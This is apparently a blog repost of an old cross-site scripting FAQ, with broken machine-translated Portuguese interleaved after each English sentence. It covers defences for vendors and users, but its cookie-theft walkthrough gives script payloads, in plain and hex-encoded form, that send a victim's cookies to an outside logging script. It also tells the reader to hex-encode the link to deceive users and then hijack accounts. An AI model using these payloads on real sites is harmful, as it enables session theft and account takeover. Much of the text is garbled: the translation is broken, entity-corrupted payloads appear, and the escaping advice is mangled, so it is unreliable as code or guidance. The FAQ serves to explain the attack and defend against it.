[Tutorial] Cross-site scripting (XSS)

Introdução
What is Cross Site Scripting? O que é Cross Site Scripting?
What does XSS and CSS mean? O que XSS e CSS significa?
What are the threats of Cross Site Scripting? Quais são as ameaças de Cross Site Scripting?
What are some examples of cross site scripting attacks? Quais são alguns exemplos de ataques de cross site scripting?
Can you show me what cookie theft looks like? Você pode me mostrar o que se parece com o roubo de cookies?
What can I do to protect myself as a vendor? O que posso fazer para me proteger como um vendedor?
What can I do to protect myself as a user? O que posso fazer para me proteger como um usuário?
How common are CSS/XSS holes? Como é comum CSS / XSS buracos?
Does encryption protect me? Será que a criptografia me proteger?
Can CSS/XSS holes allow command execution? Can buracos CSS / XSS permitir a execução de comandos?
What if I don’t feel like fixing a CSS/XSS Hole? E se eu não me sinto como a fixação de um CSS / XSS Hole?
What are some links I can visit to help me further understand XSS? Quais são alguns links que podem visitar para me ajudar a entender melhor XSS?

Introduction Introdução

Websites today are more complex than ever, containing a lot of dynamic content making the experience for the user more enjoyable. Websites de hoje são mais complexas do que nunca, com um monte de conteúdo dinâmico, tornando a experiência do usuário mais agradável. Dynamic content is achieved through the use of web applications which can deliver different output to a user depending on their settings and needs. Dynamic websites suffer from a threat that static websites don’t, called “Cross Site Scripting” (or XSS dubbed by other security professionals). Currently small informational tidbits about Cross Site Scripting holes exist but none really explain them to an average person or administrator. O conteúdo dinâmico é conseguido através do uso de aplicações web que podem proporcionar uma saída diferente para um usuário dependendo de suas configurações e necessidades sites. Dinâmico sofre de uma ameaça que os sites estáticos não, chamado de “Cross Site Scripting” (ou XSS apelidado por outros profissionais de segurança). Actualmente pequenos bocadinhos de informação sobre os buracos Cross Site Scripting existem, mas ninguém realmente explicá-las a uma pessoa comum ou administrador. This FAQ was written to provide a better understanding of this emerging threat, and to give guidance on detection and prevention. Este FAQ foi escrito para fornecer uma melhor compreensão desta ameaça emergente, e para dar orientações sobre a prevenção e detecção.

“What is Cross Site Scripting?” “O que é Cross Site Scripting?

Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. Cross site scripting (também conhecido como XSS) ocorre quando uma aplicação web reúne dados de um usuário mal-intencionado. The data is usually gathered in the form of a hyperlink which contains malicious content within it. Os dados são recolhidos geralmente sob a forma de um link que contém conteúdo malicioso dentro dela. The user will most likely click on this link from another website, instant message, or simply just reading a web board or email message. O usuário irá clicar mais provável neste link de uma outra mensagem, site instantâneas, ou simplesmente lendo um conselho web ou mensagem de email. Usually the attacker will encode the malicious portion of the link to the site in HEX (or other encoding methods) so the request is less suspicious looking to the user when clicked on. Normalmente, o atacante vai codificar a parte maliciosa do link para o site em HEX (ou outros métodos de codificação) para que o pedido é menos olhar desconfiado para o usuário quando clicado. After the data is collected by the web application, it creates an output page for the user containing the malicious data that was originally sent to it, but in a manner to make it appear as valid content from the website. Depois que os dados são recolhidos através da aplicação web, ele cria uma página de saída para o usuário contendo os dados maliciosos que foi originalmente enviada a ele, mas de forma a torná-la aparecer como conteúdo válido do site. Many popular guestbook and forum programs allow users to submit posts with html and javascript embedded in them. Guestbook Muitos populares e programas fórum permitir que os usuários enviem mensagens com HTML e JavaScript embutidos nelas. If for example I was logged in as “john” and read a message by “joe” that contained malicious javascript in it, then it may be possible for “joe” to hijack my session just by reading his bulletin board post. Se por exemplo eu estava logado como John “e ler uma mensagem por” Joe “que continha o JavaScript malicioso nele, então ele pode ser possível que” Joe “para seqüestrar minha sessão apenas lendo seu post bulletin board. Further details on how attacks like this are accomplished via “cookie theft” are explained in detail below. Maiores detalhes sobre como os ataques como este são realizados através de “roubo de cookies” são explicados em detalhes abaixo.

“What does XSS and CSS mean?” “O que é XSS e CSS significa?”

Often people refer to Cross Site Scripting as CSS. Muitas vezes as pessoas se referem ao Cross Site Scripting como CSS. There has been a lot of confusion with Cascading Style Sheets (CSS) and cross site scripting. Houve uma grande confusão com Cascading Style Sheets (CSS) e cross site scripting. Some security people refer to Cross Site Scripting as XSS. If you hear someone say “I found a XSS hole”, they are talking about Cross Site Scripting for certain. Algumas pessoas referem-se a segurança Cross Site Scripting como XSS. Se você ouvir alguém dizer: “Eu achei um buraco XSS”, eles estão falando sobre Cross Site Scripting ao certo.

“What are the threats of Cross Site Scripting?” “Quais são as ameaças de Cross Site Scripting?

Often attackers will inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool a user (Read below for further details) in order to gather data from them. Muitas vezes, os agressores irão injetar JavaScript, VBScript, ActiveX, HTML ou Flash em um aplicativo vulnerável para enganar o usuário (Leia abaixo para mais detalhes), a fim de coletar dados a partir deles. Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. New malicious uses are being found every day for XSS attacks. Tudo a partir de seqüestro de conta, alteração das configurações do usuário, o roubo de cookies / intoxicação, ou de publicidade falsa é possível. Novos usos maliciosos estão sendo encontrados a cada dia para ataques XSS. The post below by Brett Moore brings up a good point with regard to “Denial Of Service”, and potential “auto-attacking” of hosts if a user simply reads a post on a message board. O post abaixo por Brett Moore traz um bom ponto que diz respeito à “negação de serviço”, e “auto-ataque em potencial” dos exércitos, se um usuário simplesmente lê um post em um fórum.

http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0311.html http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0311.html

“What are some examples of cross site scripting attacks?” “Quais são alguns exemplos de ataques de cross site scripting?”

One product with many XSS holes is the popular PHP program PHPnuke. This product is often targeted by attackers to probe for XSS holes because of its popularity. I have included a few links of advisories/reports that have been discovered and disclosed just from this product alone. Um produto com muitos furos XSS é o mais popular programa PHP PHPnuke. Este produto é frequentemente alvo de ataques para investigar falhas XSS, devido à sua popularidade. Incluí alguns links de avisos / relatórios que foram descobertos e divulgados apenas para este produto sozinho. The following collection should provide plenty of examples. A coleção segue deverá fornecer muitos exemplos.

http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt
http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt
http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt

“Can you show me what XSS cookie theft looks like?” “Você pode me mostrar o que XSS roubo de cookies parece?”

Depending on the particular web application some of the variables and positioning of the injections may need to be adjusted. Dependendo do aplicativo da Web em particular algumas das variáveis e posicionamento das injeções podem precisar de ser ajustados. Keep in mind the following is a simple example of an attacker’s methodology. In our example we will exploit a cross site scripting hole in a perimeter of “a.php” called “variable” via a normal request. Tenha em mente o seguinte é um exemplo simples da metodologia de um atacante. No nosso exemplo vamos explorar um cross site scripting buraco em um perímetro de “a.php” chamado “variável” através de um pedido normal. This is the most common type of cross site scripting hole that exists. Este é o tipo mais comum de cross site scripting buraco que existe.

Step 1: Targeting Passo 1: Segmentação

After you have found an XSS hole in a web application on a website, check to see if it issues cookies. Depois de ter encontrado um buraco de XSS em uma aplicação web em um site, verifique se os cookies que emite. If any part of the website uses cookies, then it is possible to steal them from its users. Se alguma parte do site utiliza cookies, então é possível roubá-los de seus usuários.

Step 2: Testing Etapa 2: Teste

Since XSS holes are different in how they are exploited, some testing will need to be done in order to make the output believable. Desde furos XSS são diferentes na forma como são explorados, alguns testes terá de ser feito para tornar a saída crível. By inserting code into the script, its output will be changed and the page may appear broken. Ao inserir o código no script, a saída será alterada ea página pode aparecer quebrados. (The end result is crucial and the attacker will have to do some touching up in the code to make the page appear normal.) Next you will need to insert some Javascript (or other client side scripting language) into the URL pointing to the part of the site which is vulnerable. Below I have provided a few links that are for public use when testing for XSS holes. (O resultado final é crucial e que o atacante terá que fazer alguns retoques no código para fazer a página aparecer normal.) Em seguida você terá de inserir alguns Javascript (do lado do cliente ou outras linguagem de scripting) para o URL que aponta para a parte do sítio que é vulnerável. Abaixo eu ter fornecido alguns links que são de uso público no ensaio para a abertura de XSS. These links below, when clicked on will send the users cookie to http://www.cgisecurity.com/cgi-bin/cookie.cgi and will display it. If you see a page displaying a cookie then session hijacking of the user’s account may be possible. Estes links abaixo, quando clicado irá enviar o cookie usuários http://www.cgisecurity.com / cgi-bin / cookie.cgi e vai exibi-lo. Se você ver uma página que exibe um cookie depois de seqüestro de sessão da conta do usuário pode ser possível.

Cookie theft Javascript Examples. Roubo de cookies Javascript Exemplos.
A example of usage is below. Um exemplo de utilização é baixo.

ASCII Usage: ASCII Uso:

http://host/a.php?variable=”><script>document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi? ‘%20+document.cookie</script> http://host/a.php?variable = “> <script> document.location = ‘http://www.cgisecurity.com/cgi-bin/cookie.cgi?% 20 + document.cookie </ script >

Hex Usage: Hex Uso:

http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e http://host/a.php?variable% = 22% 3e% 3c% 73% 63% 72% 69% 70% 74% 3e% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2e % 6c% 6f% 63% 61% 74% 69% 6f% 6e% 3d% 27% 68% 74% 74% 70% 3A% 2F% 2F% 77% 77% 77% 2e% 63% 67% 69% 73 % 65% 63% 75% 72% 69% 74% 79% 2e% 63% 6f% 6d% 2f% 63% 67% 69% 2d% 62% 69% 6e% 2f% 63% 6f% 6f% 6b% 69 % 65% 2e% 63% 67% 69% 3f% 27% 20% 2b% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2e% 63% 6f% 6f% 6b% 69% 65% 3c % 2f% 73% 63% 72% 69% 70% 74% 3e

NOTE : The request is first shown in ASCII, then in Hex for copy and paste purposes. NOTA: O pedido é exibido pela primeira vez em ASCII, Hex, em seguida, para fins de cópia e colagem.

1. 1. “><script>document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi?&#8217; “> <script> document.location = ‘http://www.cgisecurity.com/cgi-bin/cookie.cgi? +document.cookie</script> + document.cookie </ script>

HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e HEX% 22% 3e% 3c% 73% 63% 72% 69% 70% 74% 3e% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2e
%6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f % 6c% 6f% 63% 61% 74% 69% 6f% 6e% 3d% 27% 68% 74% 74% 70% 3A% 2F% 2F% 77% 77% 77% 2e% 63% 67% 69% 73 % 65% 63% 75% 72% 69% 74% 79% 2e% 63% 6f% 6d% 2f% 63% 67% 69% 2d% 62% 69% 6e% 2f
%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e % 63% 6f% 6f% 6b% 69% 65% 2e% 63% 67% 69% 3f% 27% 20% 2b% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2e% 63% 6f % 6f% 6b% 69% 65% 3c% 2f% 73% 63% 72% 69% 70% 74% 3e

2.  <script>document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi?&#8217; 2. <script> Document.location = ‘http://www.cgisecurity.com/cgi-bin/cookie.cgi? +document.cookie</script> + document.cookie </ script>

HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f HEX% 3c% 73% 63% 72% 69% 70% 74% 3e% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2e% 6c% 6f
%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b % 63% 61% 74% 69% 6f% 6e% 3d% 27% 68% 74% 74% 70% 3A% 2F% 2F% 77% 77% 77% 2e% 63% 67% 69% 73% 65% 63 % 75% 72% 69% 74% 79% 2e% 63% 6f% 6d% 2f% 63% 67% 69% 2d% 62% 69% 6e% 2f% 63% 6f% 6f% 6b
%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e % 69% 65% 2e% 63% 67% 69% 3f% 27% 20% 2b% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2e% 63% 6f% 6f% 6b% 69% 65 % 3c% 2f% 73% 63% 72% 69% 70% 74% 3e

3.  ><script>document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi?&#8217; 3.> <script> Document.location = ‘http://www.cgisecurity.com/cgi-bin/cookie.cgi? +document.cookie</script> + document.cookie </ script>

HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c HEX% 3e% 3c% 73% 63% 72% 69% 70% 74% 3e% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2e% 6c
%6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f % 6f% 63% 61% 74% 69% 6f% 6e% 3d% 27% 68% 74% 74% 70% 3A% 2F% 2F% 77% 77% 77% 2e% 63% 67% 69% 73% 65 % 63% 75% 72% 69% 74% 79% 2e% 63% 6f% 6d% 2f% 63% 67% 69% 2d% 62% 69% 6e% 2f% 63% 6f% 6f
%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3e % 6b% 69% 65% 2e% 63% 67% 69% 3f% 27% 20% 2b% 64% 6f% 63% 75% 6d% 65% 6e% 74% 2e% 63% 6f% 6f% 6b% 69 % 65% 3c% 2f% 73% 63% 72% 69% 70% 74% 3e

These are the examples of “evil” Javascript we will be using. Estes são os exemplos do “mal” Javascript iremos utilizar. These Javascript examples gather the users cookie and then send a request to the cgisecurity.com website with the cookie in the query. Estes exemplos Javascript coletar o cookie de usuários e, em seguida, enviar um pedido ao site cgisecurity.com com o cookie na consulta. My script on cgisecurity.com logs each request and each cookie. Meu script em cgisecurity.com logs de cada pedido e cada bolinho. In simple terms it is doing the following: Em termos simples, é fazer o seguinte:

My cookie = user=zeno; id=021 Meu cookie = user = Zeno; id = 021
My script = http://www.cgisecurity.com/cgi-bin/cookie.cgi Meu script = http://www.cgisecurity.com / cgi-bin / cookie.cgi

It sends a request to my site that looks like this. Ele envia um pedido ao meu site parecido com este.

GET /cgi-bin/cookie.cgi?user=zeno;%20id=021 (Note: %20 is a hex encoding for a space) GET / usuário cgi-bin/cookie.cgi? = Zeno;% 20id = 021 (Nota: 20% é uma codificação hexadecimal para um espaço)

This is a primitive but effective way of grabbing a user’s cookie. Esta é uma forma primitiva, mas eficiente de pegar um cookie do usuário. Logs of the use of this public script can be found at www.cgisecurity.com/articles/cookie-theft.log Históricos da utilização desse script público pode ser encontrada em www.cgisecurity.com / artigos / cookie-theft.log

Step 3: XSS Execution Etapa 3: Execução de XSS

Hand out your crafted url or use email or other related software to help launch it. Distribua o seu url trabalhada ou e-mail ou utilize outro software relacionado para ajudar a lançá-lo. Make sure that if you provide the URL to the user(through email, aim, or other means) that you at least HEX encode it. The code is obviously suspicious looking but a bunch of hex characters may fool a few people. Certifique-se que se você fornecer a URL para o utilizador (através de email, o objectivo, ou outros meios) que você HEX, pelo menos, codificá-lo. O código é, obviamente, de aparência suspeita, mas um monte de caracteres hexadecimais pode enganar algumas pessoas.

In my example I only forward the user to cookie.cgi. No meu exemplo eu só transmitir ao utilizador cookie.cgi. A attacker with more time could do a few redirects and XSS combo’s to steal the user’s cookie, and return them to the website without noticing the cookie theft. Um atacante com mais tempo, poderia fazer alguns redirecionamentos e combo XSS para roubar o cookie do usuário, e devolvê-los ao site, sem perceber o roubo de cookies.
Some email programs may execute the Javascript upon the opening of a message or if the Javascript is contained in a message attachment. Alguns programas de e-mail pode executar o Javascript mediante a abertura de uma mensagem ou se o Javascript está contido em um anexo da mensagem. Larger sites like Hotmail do allow Javascript inside attachments but they do special filtering to prevent cookie theft. Grandes sites como o Hotmail não permite que o Javascript dentro de acessórios, mas eles fazem a filtragem especial para evitar o roubo de cookies.

Step 4: What to do with this data Etapa 4: O que fazer com esses dados

Once you have gotten the user to execute the XSS hole, the data is collected and sent to your CGI script. Depois de ter obtido o usuário execute o buraco XSS, os dados são recolhidos e enviados para o script CGI. Now that you have the cookie you can use a tool like Websleuth to see if account hijacking is possible. Agora que você tem o cookie que você pode usar uma ferramenta como WebSleuth para ver se é possível seqüestro de conta.
This is only a FAQ, not a detailed paper on cookie theft and modification. A new paper released by David Endler of iDefense goes into more detail on some of the ways to automatically launch XSS holes. Este é apenas um FAQ, e não um documento detalhado sobre o roubo de cookies e modificação. Um novo estudo divulgado pelo David Endler da iDefense entra em mais detalhes sobre algumas das maneiras de iniciar automaticamente furos XSS. This paper can be found at http://www.idefense.com/XSS.html . Este documento pode ser encontrado em http://www.idefense.com/XSS.html.

“What can I do to protect myself as a vendor?” “O que posso fazer para me proteger como um vendedor?”

This is a simple answer. Esta é uma resposta simples. Never trust user input and always filter metacharacters. Nunca a entrada do usuário de confiança e sempre metacaracteres filtro. This will eliminate the majority of XSS attacks. Isto irá eliminar a maioria dos ataques XSS. Converting < and >  to &lt; and &gt; is also suggested when it comes to script output. Convertendo <e> para <e> também é sugerida quando se trata de saída de script. Remember XSS holes can be damaging and costly to your business if abused. Often attackers will disclose these holes to the public, which can erode customer and public confidence in the security and privacy of your organization’s site. Lembre-se furos XSS pode ser prejudicial e oneroso para o seu negócio se abusado. Muitas vezes, os agressores irão divulgar esses buracos para o público, que pode corroer a confiança dos clientes e do público na segurança e privacidade do site de sua organização. Filtering < and > alone will not solve all cross site scripting attacks. Filtragem <e> por si só não resolverá todos os ataques de cross site scripting. It is suggested you also attempt to filter out ( and ) by translating them to ( and ) , ” to " , ‘ to &#39, and also # and & by translating them to &#35 (#) and &#38 (&). Sugere-se também uma tentativa de filtrar (e), traduzindo-os (e), “a”, “a”, e também por & # e traduzi-los para o & # 35 (#) e & (&).

“What can I do to protect myself as a user?” “O que posso fazer para me proteger como um usuário?”

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view. A maneira mais fácil para proteger-se como usuário, é só seguir os links do site principal que você deseja ler. If you visit one website and it links to CNN for example, instead of clicking on it visit CNN’s main site and use its search engine to find the content. Se você visitar um site e links para CNN, por exemplo, ao invés de clicar sobre ela visite o site principal da CNN, e usar o seu motor de busca para encontrar o conteúdo. This will probably eliminate ninety percent of the problem. Este será, provavelmente, eliminar a noventa por cento do problema. Sometimes XSS can be executed automatically when you open an email, email attachment, read a guestbook, or bulletin board post. Às vezes XSS pode ser executado automaticamente quando você abre um e-mail, anexo de email, ler um livro de visitas, ou post bulletin board. If you plan on opening an email, or reading a post on a public board from a person you don’t know BE CAREFUL. Se você está pensando em abrir um e-mail, ou ler um post sobre um conselho público de uma pessoa que você não sabe CUIDADO. One of the best ways to protect yourself is to turn off Javascript in your browser settings. Uma das melhores maneiras de proteger a si mesmo é desligar o Javascript nas configurações do seu navegador. In IE turn your security settings to high. No IE transformar suas configurações de segurança para alto. This can prevent cookie theft, and in general is a safer thing to do. Isso pode impedir o roubo de cookies, e em geral é uma coisa segura a fazer.

“How common are XSS holes?” “Como é comum uns furos XSS?”

Cross site scripting holes are gaining popularity among hackers as easy holes to find in large websites. Cross site scripting buracos estão ganhando popularidade entre os hackers como buracos fácil de encontrar em grandes sites. Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had one form or another of XSS bugs. Websites de FBI.gov, CNN.com, Time.com, Ebay, Yahoo, computador Apple, Microsoft, ZDNet, Wired, e Newsbytes têm tido uma ou outra forma de bugs XSS.

Every month roughly 10-25 XSS holes are found in commercial products and advisories are published explaining the threat. Todo mês, cerca de 10-25 furos XSS são encontrados em produtos comerciais e alertas são publicados explicando a ameaça.

“Does encryption protect me?” “A criptografia me proteger?”

Websites that use SSL (https) are in no way more protected than websites that are not encrypted. Sites que utilizam SSL (https) não são de forma mais protegidos do que os sites que não são criptografados. The web applications work the same way as before, except the attack is taking place in an encrypted connection. As aplicações web funcionam da mesma maneira como antes, exceto que o ataque está acontecendo em uma conexão criptografada. People often think that because they see the lock on their browser it means everything is secure. As pessoas muitas vezes pensam que porque eles vêem o bloqueio em seu navegador significa que tudo está seguro. This just isn’t the case. Isso não é o caso.

“Can XSS holes allow command execution?” “Pode permitir a execução de furos XSS comando?”

XSS holes can allow Javascript insertion, which may allow for limited execution. Furos XSS pode permitir a inserção Javascript, que pode permitir a execução limitada. If an attacker were to exploit a browser flaw (browser hole) it could then be possible to execute commands on the client’s side. Se um invasor explorar uma falha do navegador (browser buraco) poderia então ser possível executar comandos no lado do cliente. If command execution were possible it would only be possible on the client side. Se fosse possível a execução de comandos que só seria possível no lado do cliente. In simple terms XSS holes can be used to help exploit other holes that may exist in your browser. Em termos simples furos XSS pode ser usado para ajudar a explorar outras falhas que possam existir no seu navegador.

“What if I don’t feel like fixing a CSS/XSS Hole?” “E se eu não me sinto como a fixação de um CSS / XSS buraco?

By not fixing an XSS hole this could allow possible user account compromise in portions of your site as they get added or updated. Por não fixar um buraco XSS isso poderia permitir comprometimento do usuário em conta as possíveis partes do seu site como eles são adicionados ou atualizados. Cross Site Scripting has been found in various large sites recently and have been widely publicized. Cross Site Scripting foi encontrado em vários sites grandes recentemente e têm sido amplamente divulgados. Left unrepaired, someone may discover it and publish a warning about your company. Reparado, alguém pode descobri-lo e publicar um aviso sobre a sua empresa. This may damage your company’s reputation, depicting it as being lax on security matters. Isso pode prejudicar a reputação de sua empresa, descrevendo-o como sendo laxista em matéria de segurança. This of course also sends the message to your clients that you aren’t dealing with every problem that arises, which turns into a trust issue. Isto, claro, também envia a mensagem aos seus clientes que você não está lidando com cada problema que surge, que se transforma em um problema de confiança. If your client doesn’t trust you why would they wish to do business with you? Se o cliente não confia em você por que eles desejam fazer negócio com você?

“What are some links I can visit to help me further understand XSS?” “Quais são alguns links que podem visitar para me ajudar a entender melhor XSS?”

“Cross-site scripting tears holes in Net security” “Cross-site scripting lágrimas nos buracos de segurança Net”
http://www.usatoday.com/life/cyber/tech/2001-08-31-hotmail-security-side.htm http://www.usatoday.com/life/cyber/tech/2001-08-31-hotmail-security-side.htm

Article on XSS holes Artigo sobre furos XSS
http://www.perl.com/pub/a/2002/02/20/css.html http://www.perl.com/pub/a/2002/02/20/css.html

“CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests” “CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests”
http://www.cert.org/advisories/CA-2000-02.html http://www.cert.org/advisories/CA-2000-02.html

Paper on Removing Meta-characters from User Supplied Data in CGI Scripts. Livro sobre Removendo Meta-caracteres de dados fornecidos no Manual de scripts CGI.
http://www.cert.org/tech_tips/cgi_metacharacters.html http://www.cert.org/tech_tips/cgi_metacharacters.html

Paper on Microsoft’s Passport System Livro sobre o Microsoft Passport do Sistema
http://eyeonsecurity.net/papers/passporthijack.html http://eyeonsecurity.net/papers/passporthijack.html

Paper on Cookie Theft Livro sobre Cookie Theft
http://www.eccentrix.com/education/b0iler/tutorials/javascript.htm#cookies http://www.eccentrix.com/education/b0iler/tutorials/javascript.htm cookies #

  1. No trackbacks yet.

Deixe uma resposta

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s

%d blogueiros gostam disto: